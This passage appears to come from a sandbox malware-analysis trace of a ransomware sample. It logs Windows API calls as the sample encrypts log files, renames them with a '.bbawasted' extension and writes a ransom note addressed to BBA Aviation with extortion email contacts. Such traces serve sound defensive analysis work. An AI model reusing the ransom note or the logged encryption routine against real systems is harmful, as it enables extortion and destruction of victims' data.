(hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5044) returned 0x5f0000 [0241.318] CloseHandle (hObject=0x294) returned 1 [0241.320] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0241.321] CloseHandle (hObject=0x28c) returned 1 [0241.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aabf8 [0241.321] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a5f10) returned 1 [0241.321] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x1b8, pbBuffer=0x6aac40 | out: pbBuffer=0x6aac40) returned 1 [0241.321] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0241.322] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6708) returned 1 [0241.322] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0241.322] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0241.337] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0241.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aabf8 | out: hHeap=0x660000) returned 1 [0241.337] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0241.337] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Y7Dy9/PLyRnas0IQ1ihJ64kCS0XLHwRUzVOPLYjCgWSzH9OgeDe14IQ5z049AZEj\r\nr+gqsKACqOQVe+CocJgcZEQZ4gHs3Asg/lyNtbAgR13rN8Rq0YfGm5jKyZbX6u5l\r\n73v166fnVp42EFUqv7HmlyVaWqIFp4JdZ6PaZtgyYJ48XlnH+EC6O3QArj7tcku1\r\nBOtg2yGu8+RO6MW9FqkwFN7CQ3HI+c9eQAsScATXyUcMkSWoOTjIJHSxklxIcIEt\r\nkV8boXQXAthU/TzFWMk9Y5Z7VRNzBG5OPX8fKAOLDuLaVmqUy0+Onm5eMrD8JLkI\r\nf+XdAi0htLDVLCqiKd5BoOKtJiXFDS3wyJ/emZlF0JBUZdHQkEX1elDWlT1s3ueg\r\nxXGOygr3lF+m8ZZRDRJ1AUVJ8kueGhjSL8HNjskSmyW7QUEU2lFNCFAKl+z2PVFV\r\n/o/FPmqbn/DnFowSkZ1qDQ7L0h0phGu+fSATdcLj3aVDibuqZxmv17fxi7oA7VLW\r\nBrHPVpZ8wJaViMIWQTDslSP00jEaDb0rXRdeFD4uJpZqORrV5U63Dcy1KgdCqszD\r\nU2YerJ3tZrgfBKvXxhmg6ho5vwYaqzJvSYpjBDWwYJlE98AYQWSe1YgPBVQef6md\r\nVRaITcUTYqbLmxEHE5f29KH03hsWYh2i1iJIVbA27/I=[end_key]\r\nKEEP IT\r\n") returned 984 [0241.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0241.337] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0241.338] SetEndOfFile (hFile=0x290) returned 1 [0241.479] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0241.479] CloseHandle (hObject=0x290) returned 1 [0241.479] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0241.480] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a4fb8 | out: hHeap=0x660000) returned 1 [0241.480] SetEvent (hEvent=0x274) returned 1 [0241.486] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0241.486] CloseHandle (hObject=0x278) returned 1 [0241.486] CloseHandle (hObject=0x274) returned 1 [0241.486] CloseHandle (hObject=0x200) returned 1 [0241.486] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x67c670 | out: hHeap=0x660000) returned 1 [0241.486] _snprintf (in: _Dest=0x12ffee0, _Count=0x21, _Format="%u %u %u" | out: _Dest="466 462 4") returned 9 [0241.487] WriteFile (in: hFile=0x24c, lpBuffer=0x12ffee0*, nNumberOfBytesToWrite=0x9, lpNumberOfBytesWritten=0x12fff74, lpOverlapped=0x0 | out: lpBuffer=0x12ffee0*, lpNumberOfBytesWritten=0x12fff74*=0x9, lpOverlapped=0x0) returned 1 [0241.487] SetEndOfFile (hFile=0x24c) returned 1 [0241.491] CloseHandle (hObject=0x24c) returned 1 Thread: id = 510 os_tid = 0xec8 [0158.585] WaitForMultipleObjects (nCount=0x2, lpHandles=0x147ff78*=0x274, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0158.595] _aulldvrm () returned 0x0 [0158.595] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x688f28) returned 1 [0158.596] CryptGenRandom (in: hProv=0x688f28, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0158.596] CryptReleaseContext (hProv=0x688f28, dwFlags=0x0) returned 1 [0158.596] lstrlenW (lpString="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 61 [0158.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x284) returned 0x69e318 [0158.596] lstrcpyW (in: lpString1=0x69e392, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0158.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x69e5a8 [0158.596] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x688f28) returned 1 [0158.597] CryptGenRandom (in: hProv=0x688f28, dwLen=0xa3a, pbBuffer=0x69e5a8 | out: pbBuffer=0x69e5a8) returned 1 [0158.597] CryptReleaseContext (hProv=0x688f28, dwFlags=0x0) returned 1 [0158.597] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log.bbawasted_info" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0158.602] WriteFile (in: hFile=0x288, lpBuffer=0x69e5a8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x69e5a8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0158.604] SetEndOfFile (hFile=0x288) returned 1 [0158.604] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.604] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e5a8 | out: hHeap=0x660000) returned 1 [0158.604] lstrcpyW (in: lpString1=0x69e392, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0158.604] MoveFileW (lpExistingFileName="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log.bbawasted" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log.bbawasted")) returned 1 [0158.676] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log.bbawasted" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284 [0158.676] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0158.676] GetFileSize (in: hFile=0x284, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xa6b2 [0158.676] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa6b2) returned 0x630000 [0158.677] CloseHandle (hObject=0x284) returned 1 [0158.697] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0158.698] CloseHandle (hObject=0x28c) returned 1 [0158.698] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6a0720 [0158.698] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x688f28) returned 1 [0158.699] CryptGenRandom (in: hProv=0x688f28, dwLen=0x1b8, pbBuffer=0x6a0768 | out: pbBuffer=0x6a0768) returned 1 [0158.699] CryptReleaseContext (hProv=0x688f28, dwFlags=0x0) returned 1 [0158.699] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x688f28) returned 1 [0158.699] CryptGenRandom (in: hProv=0x688f28, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0158.699] CryptReleaseContext (hProv=0x688f28, dwFlags=0x0) returned 1 [0158.772] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6a3670 [0158.772] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0720 | out: hHeap=0x660000) returned 1 [0158.772] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x69f5b0 [0158.773] _snwprintf (in: _Dest=0x69f5b0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]nAKAiUTrhI9wikObECojgioXJjLkIW2M14xqCu5IYfP2tUVkeLPKPgAJ+ym37HHp\r\nqlvvliPN8fAolqHAySblL54BSLHSL218EGJahC3+3kTbsM4mp2PYuQlUOdncIKOZ\r\nj6NvNX++wi3WFK+pErn0xFymq1UAyOThQbo0G3YIBj5uY6pmjTq3PA1eta1X+JSj\r\naFJECKhIsPGDTMQnrat/E9R9ybDxhKLvq7CylJXdwF7Y+JBUFJbOKun99eBZkOKB\r\nvucw3fycJF/eT9m/cOj88mbfb6gg2fsP/rg9dku/I4iuKlwW6cNZDCtA2E8l2vgs\r\ns+Oa1vGUsSJg6hzMpcfqeEvZwmdgP/mLxT6sSTrpzoB3DQuDCrWUvFRk33GbL3OW\r\ncIfMttk1gpBl2u0gpSUhEaQJqVHRrIjdidB5rC+MgRzeEB3zem4fei45jY8dxFi9\r\n5nEJeM3AASHpGqG0a4n0NxiTmwN/nRZz9G95beDRMU/++/0RcvyvA+1Mg1lP/RHN\r\nDN5FNMBoDdOXsobtN2rRsPpgJ4Ola0eickLJNCE4RqZiWGAH+pfW4gydFSnytrN0\r\nW0KG6uaMjzfppxNaORNBcSpC+DFtLxZLPTKRc9U2WcT2wDw9NYuORvrppzUk+3PZ\r\n9TD2aiQGIZvYLyaeVn+CRpZzD73ucYek9fdUGsAPZeA=[end_key]\r\nKEEP IT\r\n") returned 984 [0158.773] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a3670 | out: hHeap=0x660000) returned 1 [0158.773] WriteFile (in: hFile=0x288, lpBuffer=0x69f5b0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x69f5b0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0158.774] SetEndOfFile (hFile=0x288) returned 1 [0158.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69f5b0 | out: hHeap=0x660000) returned 1 [0158.778] CloseHandle (hObject=0x288) returned 1 [0158.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0158.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x679f30 | out: hHeap=0x660000) returned 1 [0158.784] _aulldvrm () returned 0x0 [0158.784] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x688f28) returned 1 [0158.785] CryptGenRandom (in: hProv=0x688f28, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0158.785] CryptReleaseContext (hProv=0x688f28, dwFlags=0x0) returned 1 [0158.785] lstrlenW (lpString="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 56 [0158.785] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x69e318 [0158.785] lstrcpyW (in: lpString1=0x69e388, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0158.785] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x69f5b0 [0158.785] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x688f28) returned 1 [0158.786] CryptGenRandom (in: hProv=0x688f28, dwLen=0xa3a, pbBuffer=0x69f5b0 | out: pbBuffer=0x69f5b0) returned 1 [0158.786] CryptReleaseContext (hProv=0x688f28, dwFlags=0x0) returned 1 [0158.787] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log.bbawasted_info" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0158.787] WriteFile (in: hFile=0x288, lpBuffer=0x69f5b0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x69f5b0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0158.789] SetEndOfFile (hFile=0x288) returned 1 [0158.789] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.789] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69f5b0 | out: hHeap=0x660000) returned 1 [0158.789] lstrcpyW (in: lpString1=0x69e388, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0158.789] MoveFileW (lpExistingFileName="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log.bbawasted" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log.bbawasted")) returned 1 [0158.932] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log.bbawasted" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284 [0158.932] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0158.932] GetFileSize (in: hFile=0x284, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x1774 [0158.932] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1774) returned 0x630000 [0158.932] CloseHandle (hObject=0x284) returned 1 [0158.945] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0158.945] CloseHandle (hObject=0x290) returned 1 [0158.945] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6ac460 [0158.946] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6ac668) returned 1 [0158.947] CryptGenRandom (in: hProv=0x6ac668, dwLen=0x1b8, pbBuffer=0x6ac4a8 | out: pbBuffer=0x6ac4a8) returned 1 [0158.947] CryptReleaseContext (hProv=0x6ac668, dwFlags=0x0) returned 1 [0158.947] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6ac668) returned 1 [0158.947] CryptGenRandom (in: hProv=0x6ac668, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0158.947] CryptReleaseContext (hProv=0x6ac668, dwFlags=0x0) returned 1 [0158.958] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac460 | out: hHeap=0x660000) returned 1 [0158.958] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6aca78 [0158.958] _snwprintf (in: _Dest=0x6aca78, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]tZXK836EfpZJ++mVTcdIyfVIe2LTIOcm4D985X28TLkyXXbxiCgwkUWJT92pcXo2\r\nSoW5fXbzWKh14lOPL0hv1gmxk7SPNPLoYFV0z9BenKqAGYxGOomNkWHtGzZuu4to\r\nJmrUO8W0/+Zh3yN4tdOIMnd1b6L9KVSEta+F2alGpwsaXd0LV2GRr/v3MAMDlqCM\r\ncsdsqiWvu/C2ZALS6bicD003dmEc3cxJw+OYhBsS5G420qr/11AiKM9gjHvE2pik\r\nMKepLWtVhvftn1Q3UYYsSXhvQdQh9PIqsqR/UPlPP88B9zIaQSWvug/SJ9SktVni\r\nMUf90jXnjTeFxSxd2ANlIIiime/m5ngTgrjMfv1ZRox81Odvec22jtIcTU+yACgG\r\nFnnZtzvH4NxVJRdhQBOnE65FvRULnazj6H1/z9sca+XI9nH9Fpc3qdwypM1B/08u\r\nfP13n9AiwZ3DMZWPbFpbEi6AWF1cHC88r1ZXyOBYlqUSNMtUDQfwJMkkm01vo9Mk\r\nYrxa9ECXyrMRzwVcML9fbIdtb+eADLODl3SSU1KwXyqNEXaBVaxvRjwKGr6I8ua6\r\n1vC4UcuKYt1CWK3eU3dGhkL8RHunyhzedyGIwwLht1REZVu/tDZR9f/APHB1uMSV\r\nxn+6NeeBwSRe1xXSqrl3riUJNZvHJGFKADCfNEl5aA1=[end_key]\r\nKEEP IT\r\n") returned 984 [0158.959] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac668 | out: hHeap=0x660000) returned 1 [0158.959] WriteFile (in: hFile=0x288, lpBuffer=0x6aca78*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6aca78*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0158.959] SetEndOfFile (hFile=0x288) returned 1 [0158.961] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aca78 | out: hHeap=0x660000) returned 1 [0158.961] CloseHandle (hObject=0x288) returned 1 [0159.032] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0159.032] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66d3a8 | out: hHeap=0x660000) returned 1 [0159.032] _aulldvrm () returned 0x0 [0159.032] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x66d3a8) returned 1 [0159.033] CryptGenRandom (in: hProv=0x66d3a8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0159.033] CryptReleaseContext (hProv=0x66d3a8, dwFlags=0x0) returned 1 [0159.033] lstrlenW (lpString="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 54 [0159.033] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x276) returned 0x69e318 [0159.033] lstrcpyW (in: lpString1=0x69e384, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0159.033] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6add90 [0159.033] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x66d3a8) returned 1 [0159.033] CryptGenRandom (in: hProv=0x66d3a8, dwLen=0xa3a, pbBuffer=0x6add90 | out: pbBuffer=0x6add90) returned 1 [0159.033] CryptReleaseContext (hProv=0x66d3a8, dwFlags=0x0) returned 1 [0159.033] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log.bbawasted_info" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0159.034] WriteFile (in: hFile=0x288, lpBuffer=0x6add90*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6add90*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0159.036] SetEndOfFile (hFile=0x288) returned 1 [0159.036] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.036] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6add90 | out: hHeap=0x660000) returned 1 [0159.036] lstrcpyW (in: lpString1=0x69e384, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0159.036] MoveFileW (lpExistingFileName="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log.bbawasted" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log.bbawasted")) returned 1 [0159.037] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log.bbawasted" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284 [0159.037] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0159.037] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x28) returned 0x630000 [0159.037] CloseHandle (hObject=0x284) returned 1 [0159.040] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x66d3a8) returned 1 [0159.040] CryptGenRandom (in: hProv=0x66d3a8, dwLen=0x1b8, pbBuffer=0x6be5a8 | out: pbBuffer=0x6be5a8) returned 1 [0159.040] CryptReleaseContext (hProv=0x66d3a8, dwFlags=0x0) returned 1 [0159.041] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x66d3a8) returned 1 [0159.041] CryptGenRandom (in: hProv=0x66d3a8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0159.041] CryptReleaseContext (hProv=0x66d3a8, dwFlags=0x0) returned 1 [0159.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be560 | out: hHeap=0x660000) returned 1 [0159.053] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6add90 [0159.053] _snwprintf (in: _Dest=0x6add90, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 